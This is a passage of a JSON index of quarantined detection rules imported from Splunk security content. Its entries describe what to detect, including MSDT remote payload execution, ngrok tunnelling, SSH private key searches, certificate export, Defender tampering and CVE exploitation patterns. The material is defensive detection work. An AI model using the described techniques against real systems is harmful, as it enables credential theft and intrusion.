"imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-sqlite3-lsquarantine-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1997b2e-655f-4561-82fd-aeba8e1c1a86", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml" } }, { "id": "splunk-security-content-e1c6dec5-2249-442d-a1f9-99a4bd228183", "type": "detection", "name": "Linux c99 Privilege Escalation", "description": "The following analytic detects the execution of the c99 utility with sudo privileges, which can lead to privilege escalation on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential misuse of the c99 utility to gain root access, which is critical for maintaining system security. If confirmed malicious, this could allow an attacker to execute commands as root, potentially compromising the entire system and accessing sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-c99-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1c6dec5-2249-442d-a1f9-99a4bd228183", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_c99_privilege_escalation.yml" } }, { "id": "splunk-security-content-e1d5145f-38fe-42b9-a5d5-457796715f97", "type": "detection", "name": "Windows Execute Arbitrary Commands with MSDT", "description": "The following analytic detects arbitrary command execution using Windows msdt.exe, a Diagnostics Troubleshooting Wizard. It leverages Endpoint Detection and Response (EDR) data to identify instances where msdt.exe is invoked via the ms-msdt:/ protocol handler to retrieve a remote payload. This activity is significant as it can indicate an exploitation attempt leveraging msdt.exe to execute arbitrary commands, potentially leading to unauthorized code execution. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or persist within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-execute-arbitrary-commands-with-msdt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1d5145f-38fe-42b9-a5d5-457796715f97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml" } }, { "id": "splunk-security-content-e20313d2-7d63-4fcf-b2d9-d6e12c6c7bd7", "type": "detection", "name": "Cisco Secure Firewall - Rare Snort Rule Triggered", "description": "This analytic identifies Snort signatures that have triggered only once in the past 7 days across all Cisco Secure Firewall IntrusionEvent logs. While these rules typically do not trigger in day-to-day network activity, their sudden appearance may indicate early-stage compromise, previously unseen malware, or reconnaissance activity against less commonly exposed services. Investigating these outliers can provide valuable insight into new or low-noise adversary behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1598", "T1583.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-rare-snort-rule-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e20313d2-7d63-4fcf-b2d9-d6e12c6c7bd7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___rare_snort_rule_triggered.yml" } }, { "id": "splunk-security-content-e20564ca-c86c-4e30-acdb-a8486673426f", "type": "detection", "name": "Ivanti EPM SQL Injection Remote Code Execution", "description": "This detection identifies potential exploitation of a critical SQL injection vulnerability in Ivanti Endpoint Manager (EPM), identified as CVE-2024-29824.\nThe vulnerability, which has a CVSS score of 9.8, allows for remote code execution through the `RecordGoodApp` function in the `PatchBiz.dll` file.\nAn attacker can exploit this vulnerability by manipulating the `goodApp.md5` value in an HTTP POST request to the `/WSStatusEvents/EventHandler.asmx` endpoint, leading to unauthorized command execution on the server.\nMonitoring for unusual SQL commands and HTTP requests to this endpoint can help identify exploitation attempts.\nNote that, the detection is focused on the URI path, HTTP method and status code of 200, indicating potential exploitation.\nTo properly identify if this was successful, TLS inspection and additional network traffic analysis is required as the xp_cmdshell comes in via the request body.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-epm-sql-injection-remote-code-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e20564ca-c86c-4e30-acdb-a8486673426f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_epm_sql_injection_remote_code_execution.yml" } }, { "id": "splunk-security-content-e234970c-dcf5-4f80-b6a9-3a562544ca5b", "type": "detection", "name": "Windows Impair Defense Disable Web Evaluation", "description": "The following analytic detects modifications to the Windows registry entry \"EnableWebContentEvaluation\" to disable Windows Defender web content evaluation. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes where the registry value is set to \"0x00000000\". This activity is significant as it indicates an attempt to impair browser security features, potentially allowing malicious web content to bypass security checks. If confirmed malicious, this could lead to users interacting with harmful scripts or unsafe web elements, increasing the risk of system exploitation and security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-web-evaluation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e234970c-dcf5-4f80-b6a9-3a562544ca5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_web_evaluation.yml" } }, { "id": "splunk-security-content-e24f0a0e-41a9-419f-9999-eacab15efc36", "type": "detection", "name": "Windows System Network Config Discovery Display DNS", "description": "The following analytic identifies the execution of the \"ipconfig /displaydns\" command, which retrieves DNS reply information using the built-in Windows tool IPConfig. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line executions. Monitoring this activity is significant as threat actors and post-exploitation tools like WINPEAS often abuse this command to gather network information. If confirmed malicious, this activity could allow attackers to map the network, identify DNS servers, and potentially facilitate further network-based attacks or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-network-config-discovery-display-dns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e24f0a0e-41a9-419f-9999-eacab15efc36", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_network_config_discovery_display_dns.yml" } }, { "id": "splunk-security-content-e2549f2c-0aef-408a-b0c1-e0f270623436", "type": "detection", "name": "Windows Ngrok Reverse Proxy Usage", "description": "The following analytic detects the execution of ngrok.exe on a Windows operating system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because while ngrok is a legitimate tool for creating secure tunnels, it is increasingly used by adversaries to bypass network defenses and establish reverse proxies. If confirmed malicious, this could allow attackers to exfiltrate data, maintain persistence, or facilitate further attacks by tunneling traffic through the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ngrok-reverse-proxy-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e2549f2c-0aef-408a-b0c1-e0f270623436", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ngrok_reverse_proxy_usage.yml" } }, { "id": "splunk-security-content-e26bc52d-9cbc-4743-9745-e8781d935042", "type": "detection", "name": "M365 Copilot Non Compliant Devices Accessing M365 Copilot", "description": "Detects M365 Copilot access from non-compliant or unmanaged devices that violate corporate security policies, indicating potential shadow IT usage, BYOD policy violations, or compromised endpoint access. The detection filters M365 Copilot Graph API events where deviceDetail.isCompliant=false or deviceDetail.isManaged=false, then aggregates by user, operating system, and browser to calculate metrics including event counts, unique IPs and locations, and compliance/management status over time. Users accessing Copilot from non-compliant or unmanaged devices are flagged and sorted by activity volume and geographic spread, enabling security teams to identify unauthorized endpoints that may lack proper security controls, encryption, or MDM enrollment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-non-compliant-devices-accessing-m365-copilot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e26bc52d-9cbc-4743-9745-e8781d935042", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_non_compliant_devices_accessing_m365_copilot.yml" } }, { "id": "splunk-security-content-e27fbc5d-0445-4c4a-bc39-87f060d5c602", "type": "detection", "name": "Linux High Frequency Of File Deletion In Boot Folder", "description": "The following analytic detects a high frequency of file deletions in the /boot/ folder on Linux systems. It leverages filesystem event logs to identify when 200 or more files are deleted within an hour by the same process. This behavior is significant as it may indicate the presence of wiper malware, such as Industroyer2, which targets critical system directories. If confirmed malicious, this activity could lead to system instability or failure, hindering the boot process and potentially causing a complete system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-high-frequency-of-file-deletion-in-boot-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e27fbc5d-0445-4c4a-bc39-87f060d5c602", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_high_frequency_of_file_deletion_in_boot_folder.yml" } }, { "id": "splunk-security-content-e28b4fd4-8f5a-41cd-8222-2f1ccca53ef1", "type": "detection", "name": "Tomcat Session Deserialization Attempt", "description": "This detection identifies potential exploitation of CVE-2025-24813 in Apache Tomcat through the second stage of the attack. This phase occurs when an attacker attempts to trigger deserialization of a previously uploaded malicious session file by sending a GET request with a specially crafted JSESSIONID cookie. These requests typically have specific characteristics, including a JSESSIONID cookie with a leading dot that matches a previously uploaded filename, and typically result in a HTTP 500 error when the exploitation succeeds.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/tomcat-session-deserialization-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e28b4fd4-8f5a-41cd-8222-2f1ccca53ef1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/tomcat_session_deserialization_attempt.yml" } }, { "id": "splunk-security-content-e2b36208-a364-11eb-8909-acde48001122", "type": "detection", "name": "Plain HTTP POST Exfiltrated Data", "description": "The following analytic detects potential data exfiltration using plain HTTP POST requests. It leverages network traffic logs, specifically monitoring the `stream_http` data source for POST methods containing suspicious form data such as \"wermgr.exe\" or \"svchost.exe\". This activity is significant because it is commonly associated with malware like Trickbot, trojans, keyloggers, or APT adversaries, which use plain text HTTP POST requests to communicate with remote C2 servers. If confirmed malicious, this activity could lead to unauthorized data exfiltration, compromising sensitive information and potentially leading to further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/plain-http-post-exfiltrated-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e2b36208-a364-11eb-8909-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/plain_http_post_exfiltrated_data.yml" } }, { "id": "splunk-security-content-e2b99e7d-d956-411a-a120-2b14adfdde93", "type": "detection", "name": "Okta Authentication Failed During MFA Challenge", "description": "The following analytic identifies failed authentication attempts during the Multi-Factor Authentication (MFA) challenge in an Okta tenant. It uses the Authentication datamodel to detect specific failed events where the authentication signature is `user.authentication.auth_via_mfa`. This activity is significant as it may indicate an adversary attempting to authenticate with compromised credentials on an account with MFA enabled. If confirmed malicious, this could suggest an ongoing attempt to bypass MFA protections, potentially leading to unauthorized access and further compromise of the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-authentication-failed-during-mfa-challenge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e2b99e7d-d956-411a-a120-2b14adfdde93", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_authentication_failed_during_mfa_challenge.yml" } }, { "id": "splunk-security-content-e2d2bd10-dcd1-4b2f-8a76-0198eab32ba5", "type": "detection", "name": "Linux Auditd Find Ssh Private Keys", "description": "The following analytic detects suspicious attempts to find SSH private keys, which may indicate an attacker's effort to compromise secure access to systems. SSH private keys are essential for secure authentication, and unauthorized access to these keys can enable attackers to gain unauthorized access to servers and other critical infrastructure. By monitoring for unusual or unauthorized searches for SSH private keys, this analytic helps identify potential threats to network security, allowing security teams to quickly respond and safeguard against unauthorized access and potential breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-find-ssh-private-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e2d2bd10-dcd1-4b2f-8a76-0198eab32ba5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_find_ssh_private_keys.yml" } }, { "id": "splunk-security-content-e321804c-8eb5-42f2-a843-36b289a6c6b2", "type": "detection", "name": "ESXi Firewall Disabled", "description": "This detection identifies when the ESXi firewall is disabled or set to permissive mode, which can expose the host to unauthorized access and network-based attacks. Such changes are often a precursor to lateral movement, data exfiltration, or the installation of malicious software by a threat actor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-firewall-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e321804c-8eb5-42f2-a843-36b289a6c6b2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_firewall_disabled.yml" } }, { "id": "splunk-security-content-e3236f49-daf3-4b70-b808-9290912ac64d", "type": "detection", "name": "AWS High Number Of Failed Authentications For User", "description": "The following analytic detects an AWS account experiencing more than 20 failed authentication attempts within a 5-minute window. It leverages AWS CloudTrail logs to identify multiple failed ConsoleLogin events. This behavior is significant as it may indicate a brute force attack targeting the account. If confirmed malicious, the attacker could potentially gain unauthorized access, leading to data breaches or further exploitation of the AWS environment. Security teams should consider adjusting the threshold based on their specific environment to reduce false positives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-high-number-of-failed-authentications-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3236f49-daf3-4b70-b808-9290912ac64d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_high_number_of_failed_authentications_for_user.yml" } }, { "id": "splunk-security-content-e3308b0c-d1a1-40d5-9486-4500f0d34731", "type": "detection", "name": "M365 Copilot Application Usage Pattern Anomalies", "description": "Detects M365 Copilot users exhibiting suspicious application usage patterns including multi-location access, abnormally high activity volumes, or access to multiple Copilot applications that may indicate account compromise or automated abuse. The detection aggregates M365 Copilot Graph API events per user, calculating metrics like distinct cities/countries accessed, unique IP addresses, number of different Copilot apps used, and average events per day over the observation period. Users are flagged when they access Copilot from multiple cities (cities_count > 1), generate excessive daily activity (events_per_day > 100), or use more than two different Copilot applications (app_count > 2), which are anomalous patterns suggesting credential compromise or bot-driven abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-application-usage-pattern-anomalies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3308b0c-d1a1-40d5-9486-4500f0d34731", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_application_usage_pattern_anomalies.yml" } }, { "id": "splunk-security-content-e369afe8-cd35-47a3-9c1e-d813efc1f7dd", "type": "detection", "name": "Windows AppLocker Block Events", "description": "The following analytic detects attempts to bypass application restrictions by identifying Windows AppLocker policy violations. It leverages Windows AppLocker event logs, specifically EventCodes 8007, 8004, 8022, 8025, 8029, and 8040, to pinpoint blocked actions. This activity is significant for a SOC as it highlights potential unauthorized application executions, which could indicate malicious intent or policy circumvention. If confirmed malicious, this activity could allow an attacker to execute unauthorized applications, potentially leading to further system compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-applocker-block-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e369afe8-cd35-47a3-9c1e-d813efc1f7dd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_applocker_block_events.yml" } }, { "id": "splunk-security-content-e36de71a-6bdc-4002-98ff-e3e51b0d8f96", "type": "detection", "name": "O365 Email Password and Payroll Compromise Behavior", "description": "The following analytic identifies when an O365 email recipient receives and then deletes emails for the combination of both password and banking/payroll changes within a short period. This behavior may indicate a compromised account where the threat actor is attempting to redirect the victims payroll to an attacker controlled bank account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.008", "T1485", "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-password-and-payroll-compromise-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e36de71a-6bdc-4002-98ff-e3e51b0d8f96", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_password_and_payroll_compromise_behavior.yml" } }, { "id": "splunk-security-content-e39dc429-c2a5-4f1f-9c3c-6b211af6b332", "type": "detection", "name": "Windows Steal Authentication Certificates Export Certificate", "description": "The following analytic detects the use of the PowerShell cmdlet 'export-certificate' executed via the command line, indicating an attempt to export a certificate from the local Windows Certificate Store. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. Exporting certificates is significant as it may indicate credential theft or preparation for man-in-the-middle attacks. If confirmed malicious, this activity could allow an attacker to impersonate users, decrypt sensitive communications, or gain unauthorized access to systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-export-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e39dc429-c2a5-4f1f-9c3c-6b211af6b332", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml" } }, { "id": "splunk-security-content-e3adc0d3-9e4b-4b5d-b662-12cec1adff2a", "type": "detection", "name": "Azure AD Service Principal New Client Credentials", "description": "The following analytic detects the addition of new credentials to Service Principals and Applications in Azure AD. It leverages Azure AD AuditLogs, specifically monitoring the \"Update application*Certificates and secrets management\" operation. This activity is significant as it may indicate an adversary attempting to maintain persistent access or escalate privileges within the Azure environment. If confirmed malicious, attackers could use these new credentials to log in as the service principal, potentially compromising sensitive accounts and resources, leading to unauthorized access and control over the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-new-client-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3adc0d3-9e4b-4b5d-b662-12cec1adff2a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_new_client_credentials.yml" } }, { "id": "splunk-security-content-e3b42daf-fff4-429d-bec8-2a199468cea9", "type": "detection", "name": "Windows Modify Registry Suppress Win Defender Notif", "description": "The following analytic detects modifications in the Windows registry to suppress Windows Defender notifications. It leverages data from the Endpoint.Registry datamodel, specifically targeting changes to the \"Notification_Suppress\" registry value. This activity is significant because adversaries, including those deploying Azorult malware, use this technique to bypass Windows Defender and disable critical notifications. If confirmed malicious, this behavior could allow attackers to evade detection, maintain persistence, and execute further malicious activities without alerting the user or security tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-suppress-win-defender-notif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3b42daf-fff4-429d-bec8-2a199468cea9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml" } }, { "id": "splunk-security-content-e3d3f57a-c381-11eb-9e35-acde48001122", "type": "detection", "name": "Revil Registry Entry", "description": "The following analytic identifies suspicious modifications in the registry entry, specifically targeting paths used by malware like REVIL. It detects changes in registry paths such as `SOFTWARE\\\\WOW6432Node\\\\Facebook_Assistant` and `SOFTWARE\\\\WOW6432Node\\\\BlackLivesMatter`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry modifications linked to process GUIDs. This activity is significant as it indicates potential malware persistence mechanisms, often used by advanced persistent threats (APTs) and ransomware. If confirmed malicious, this could allow attackers to maintain persistence, encrypt files, and store critical ransomware-related information on compromised hosts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/revil-registry-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3d3f57a-c381-11eb-9e35-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/revil_registry_entry.yml" } }, { "id": "splunk-security-content-e3e7a1c0-f2b9-445c-8493-f30a63522d1a", "type": "detection", "name": "Detect Regsvcs with Network Connection", "description": "The following analytic identifies instances of Regsvcs.exe establishing a network connection to a public IP address, excluding private IP ranges. This detection leverages Sysmon EventID 3 logs to monitor network connections initiated by Regsvcs.exe. This activity is significant as Regsvcs.exe, a legitimate Microsoft-signed binary, can be exploited to bypass application control mechanisms and establish remote Command and Control (C2) channels. If confirmed malicious, this behavior could allow an attacker to escalate privileges, persist in the environment, and exfiltrate sensitive data. Immediate investigation and remediation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regsvcs-with-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3e7a1c0-f2b9-445c-8493-f30a63522d1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regsvcs_with_network_connection.yml" } }, { "id": "splunk-security-content-e3ef244e-0a67-11ec-abf2-acde48001122", "type": "detection", "name": "PetitPotam Suspicious Kerberos TGT Request", "description": "The following analytic detects a suspicious Kerberos Ticket Granting Ticket (TGT) request, identified by Event Code 4768. This detection leverages Windows Security Event Logs to identify TGT requests with unusual fields, which may indicate the use of tools like Rubeus following the exploitation of CVE-2021-36942 (PetitPotam). This activity is significant as it can signal an attacker 